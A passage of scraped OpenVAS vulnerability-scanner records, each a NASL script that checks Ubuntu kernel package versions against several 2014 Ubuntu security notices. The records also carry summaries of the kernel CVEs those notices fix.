exploit\nthese flaws to cause a denial of service (out-of-bounds write) via a\nspecially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were discovered in\nthe Linux kernel's Whiteheat USB serial driver. A physically proximate\nattacker could exploit these flaws to cause a denial of service (system\ncrash) via a specially crafted device. (CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's PicoLCD\nHID device driver. A physically proximate attacker could exploit this flaw\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode via a specially craft device. (CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on some\nCD-ROMs and DVDs) when processing indirect ICBs. An attacker who can cause\nCD, DVD or image file with a specially crafted inode to be mounted can\ncause a denial of service (infinite loop or stack consumption).\n(CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in the\nLinux kernel. A remote attacker could exploit this flaw to cause a denial\nof service (memory consumption and panic) or possibly have other\nunspecified impact via a long unencrypted auth ticket. (CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation\nfailures in the Ceph filesystem. A remote attacker could exploit this flaw\nto cause a denial of service (system crash) or possibly have unspecified\nother impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates auth\nreplies. A remote attacker could exploit this flaw to cause a denial of\nservice (system crash) or possibly have other unspecified impact.\n(CVE-2014-6418)\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2377-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2377-1/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1455-omap4\", ver:\"3.2.0-1455.75\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-10-10T00:00:00", "id": "OPENVAS:1361412562310842003", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842003", "type": "openvas", "title": "Ubuntu Update for linux USN-2376-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2376_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-2376-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842003\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-10 06:11:29 +0200 (Fri, 10 Oct 2014)\");\n script_cve_id(\"CVE-2014-3181\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-6410\", \"CVE-2014-6416\", \"CVE-2014-6417\", \"CVE-2014-6418\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Ubuntu Update for linux USN-2376-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Steven Vittitoe reported multiple stack buffer overflows in Linux kernel's\nmagicmouse HID driver. A physically proximate attacker could exploit this\nflaw to cause a denial of service (system crash) or possibly execute\narbitrary code via specially crafted devices. (CVE-2014-3181)\n\nBen Hawkes reported some off by one errors for report descriptors in the\nLinux kernel's HID stack. A physically proximate attacker could exploit\nthese flaws to cause a denial of service (out-of-bounds write) via a\nspecially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were discovered in\nthe Linux kernel's Whiteheat USB serial driver. A physically proximate\nattacker could exploit these flaws to cause a denial of service (system\ncrash) via a specially crafted device. (CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's PicoLCD\nHID device driver. A physically proximate attacker could exploit this flaw\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode via a specially craft device. (CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on some\nCD-ROMs and DVDs) when processing indirect ICBs. An attacker who can cause\nCD, DVD or image file with a specially crafted inode to be mounted can\ncause a denial of service (infinite loop or stack consumption).\n(CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in the\nLinux kernel. A remote attacker could exploit this flaw to cause a denial\nof service (memory consumption and panic) or possibly have other\nunspecified impact via a long unencrypted auth ticket. (CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation\nfailures in the Ceph filesystem. A remote attacker could exploit this flaw\nto cause a denial of service (system crash) or possibly have unspecified\nother impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates auth\nreplies. A remote attacker could exploit this flaw to cause a denial of\nservice (system crash) or possibly have other unspecified impact.\n(CVE-2014-6418)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2376-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2376-1/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-70-generic\", ver:\"3.2.0-70.105\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-70-generic-pae\", ver:\"3.2.0-70.105\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-70-highbank\", ver:\"3.2.0-70.105\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-70-omap\", ver:\"3.2.0-70.105\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-70-powerpc-smp\", ver:\"3.2.0-70.105\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-70-powerpc64-smp\", ver:\"3.2.0-70.105\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-70-virtual\", ver:\"3.2.0-70.105\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-3631", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-10-10T00:00:00", "id": "OPENVAS:1361412562310841999", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841999", "type": "openvas", "title": "Ubuntu Update for linux-lts-trusty USN-2378-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2378_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-trusty USN-2378-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841999\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-10 06:10:28 +0200 (Fri, 10 Oct 2014)\");\n script_cve_id(\"CVE-2014-3181\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3631\", \"CVE-2014-6410\", \"CVE-2014-6416\", \"CVE-2014-6417\", \"CVE-2014-6418\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Ubuntu Update for linux-lts-trusty USN-2378-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-trusty'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Steven Vittitoe reported multiple stack buffer overflows in Linux kernel's\nmagicmouse HID driver. A physically proximate attacker could exploit this\nflaw to cause a denial of service (system crash) or possibly execute\narbitrary code via specially crafted devices. (CVE-2014-3181)\n\nBen Hawkes reported some off by one errors for report descriptors in the\nLinux kernel's HID stack. A physically proximate attacker could exploit\nthese flaws to cause a denial of service (out-of-bounds write) via a\nspecially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were discovered in\nthe Linux kernel's Whiteheat USB serial driver. A physically proximate\nattacker could exploit these flaws to cause a denial of service (system\ncrash) via a specially crafted device. (CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's PicoLCD\nHID device driver. A physically proximate attacker could exploit this flaw\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode via a specially craft device. (CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's associative-array garbage\ncollection implementation. A local user could exploit this flaw to cause a\ndenial of service (system crash) or possibly have other unspecified impact\nby using keyctl operations. (CVE-2014-3631)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on some\nCD-ROMs and DVDs) when processing indirect ICBs. An attacker who can cause\nCD, DVD or image file with a specially crafted inode to be mounted can\ncause a denial of service (infinite loop or stack consumption).\n(CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in the\nLinux kernel. A remote attacker could exploit this flaw to cause a denial\nof service (memory consumption and panic) or possibly have other\nunspecified impact via a long unencrypted auth ticket. (CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation\nfailures in the Ceph filesystem. A remote attacker could exploit this flaw\nto cause a denial of service (system crash) or possibly have unspecified\nother impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates auth\nreplies. A remote attacker could exploit this flaw to cause a denial of\nservice (system crash) or possibly have other unspecified impact.\n(CVE-2014-6418)\");\n script_tag(name:\"affected\", value:\"linux-lts-trusty on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2378-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2378-1/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-generic\", ver:\"3.13.0-37.64~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-generic-lpae\", ver:\"3.13.0-37.64~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-3631", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-10-10T00:00:00", "id": "OPENVAS:1361412562310841998", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841998", "type": "openvas", "title": "Ubuntu Update for linux USN-2379-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2379_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-2379-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841998\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-10 06:10:10 +0200 (Fri, 10 Oct 2014)\");\n script_cve_id(\"CVE-2014-3181\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3631\", \"CVE-2014-6410\", \"CVE-2014-6416\", \"CVE-2014-6417\", \"CVE-2014-6418\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Ubuntu Update for linux USN-2379-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Steven Vittitoe reported multiple stack buffer overflows in Linux kernel's\nmagicmouse HID driver. A physically proximate attacker could exploit this\nflaw to cause a denial of service (system crash) or possibly execute\narbitrary code via specially crafted devices. (CVE-2014-3181)\n\nBen Hawkes reported some off by one errors for report descriptors in the\nLinux kernel's HID stack. A physically proximate attacker could exploit\nthese flaws to cause a denial of service (out-of-bounds write) via a\nspecially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were discovered in\nthe Linux kernel's Whiteheat USB serial driver. A physically proximate\nattacker could exploit these flaws to cause a denial of service (system\ncrash) via a specially crafted device. (CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's PicoLCD\nHID device driver. A physically proximate attacker could exploit this flaw\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode via a specially craft device. (CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's associative-array garbage\ncollection implementation. A local user could exploit this flaw to cause a\ndenial of service (system crash) or possibly have other unspecified impact\nby using keyctl operations. (CVE-2014-3631)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on some\nCD-ROMs and DVDs) when processing indirect ICBs. An attacker who can cause\nCD, DVD or image file with a specially crafted inode to be mounted can\ncause a denial of service (infinite loop or stack consumption).\n(CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in the\nLinux kernel. A remote attacker could exploit this flaw to cause a denial\nof service (memory consumption and panic) or possibly have other\nunspecified impact via a long unencrypted auth ticket. (CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation\nfailures in the Ceph filesystem. A remote attacker could exploit this flaw\nto cause a denial of service (system crash) or possibly have unspecified\nother impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates auth\nreplies. A remote attacker could exploit this flaw to cause a denial of\nservice (system crash) or possibly have other unspecified impact.\n(CVE-2014-6418)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2379-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2379-1/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-generic\", ver:\"3.13.0-37.64\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-generic-lpae\", ver:\"3.13.0-37.64\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-lowlatency\", ver:\"3.13.0-37.64\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-powerpc-e500\", ver:\"3.13.0-37.64\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-powerpc-e500mc\", ver:\"3.13.0-37.64\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-powerpc-smp\", ver:\"3.13.0-37.64\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-powerpc64-emb\", ver:\"3.13.0-37.64\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-37-powerpc64-smp\", ver:\"3.13.0-37.64\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-14T16:18:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5077", "CVE-2014-4655", "CVE-2014-4653", "CVE-2014-4171", "CVE-2014-3917", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-4667"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-09-03T00:00:00", "id": "OPENVAS:1361412562310841954", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841954", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-2335-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2335_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-2335-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841954\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-03 05:56:24 +0200 (Wed, 03 Sep 2014)\");\n script_cve_id(\"CVE-2014-3917\", \"CVE-2014-4027\", \"CVE-2014-4171\", \"CVE-2014-4652\",\n \"CVE-2014-4653\", \"CVE-2014-4654\", \"CVE-2014-4655\", \"CVE-2014-4656\",\n \"CVE-2014-4667\", \"CVE-2014-5077\");\n script_tag(name:\"cvss_base\", value:\"6.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:C\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-2335-1\");\n\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"An flaw was discovered in the Linux kernel's audit subsystem\nwhen auditing certain syscalls. A local attacker could exploit this flaw to\nobtain potentially sensitive single-bit values from kernel memory or cause a\ndenial of service (OOPS). (CVE-2014-3917)\n\nAn information leak was discovered in the rd_mcp backend of the iSCSI\ntarget subsystem in the Linux kernel. A local user could exploit this flaw\nto obtain sensitive information from ramdisk_mcp memory by leveraging\naccess to a SCSI initiator. (CVE-2014-4027)\n\nSasha Levin reported an issue with the Linux kernel's shared memory\nsubsystem when used with range notifications and hole punching. A local\nuser could exploit this flaw to cause a denial of service. (CVE-2014-4171)\n\nAn information leak was discovered in the control implementation of the\nAdvanced Linux Sound Architecture (ALSA) subsystem in the Linux kernel. A\nlocal user could exploit this flaw to obtain sensitive information from\nkernel memory. (CVE-2014-4652)\n\nA use-after-free flaw was discovered in the Advanced Linux Sound\nArchitecture (ALSA) control implementation of the Linux kernel. A local\nuser could exploit this flaw to cause a denial of service (system crash).\n(CVE-2014-4653)\n\nA authorization bug was discovered with the snd_ctl_elem_add function of\nthe Advanced Linux Sound Architecture (ALSA) in the Linux kernel. A local\nuser could exploit his bug to cause a denial of service (remove kernel\ncontrols). (CVE-2014-4654)\n\nA flaw discovered in how the snd_ctl_elem function of the Advanced Linux\nSound Architecture (ALSA) handled a reference count. A local user could\nexploit this flaw to cause a denial of service (integer overflow and limit\nbypass). (CVE-2014-4655)\n\nAn integer overflow flaw was discovered in the control implementation of\nthe Advanced Linux Sound Architecture (ALSA). A local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2014-4656)\n\nAn integer underflow flaw was discovered in the Linux kernel's handling of\nthe backlog value for certain SCTP packets. A remote attacker could exploit\nthis flaw to cause a denial of service (socket outage) via a crafted SCTP\npacket. (CVE-2014-4667)\n\nJason Gunthorpe reported a flaw with SCTP authentication in the Linux\nkernel. A remote attacker could exploit this flaw to cause a denial of\nservice (NULL pointer dereference and OOPS). (CVE-2014-5077)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2335-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2335-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1452-omap4\", ver:\"3.2.0-1452.72\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-14T16:18:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5077", "CVE-2014-4655", "CVE-2014-4508", "CVE-2014-4653", "CVE-2014-4171", "CVE-2014-3917", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-4667"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-09-03T00:00:00", "id": "OPENVAS:1361412562310841948", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841948", "type": "openvas", "title": "Ubuntu Update for linux USN-2334-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2334_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-2334-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT 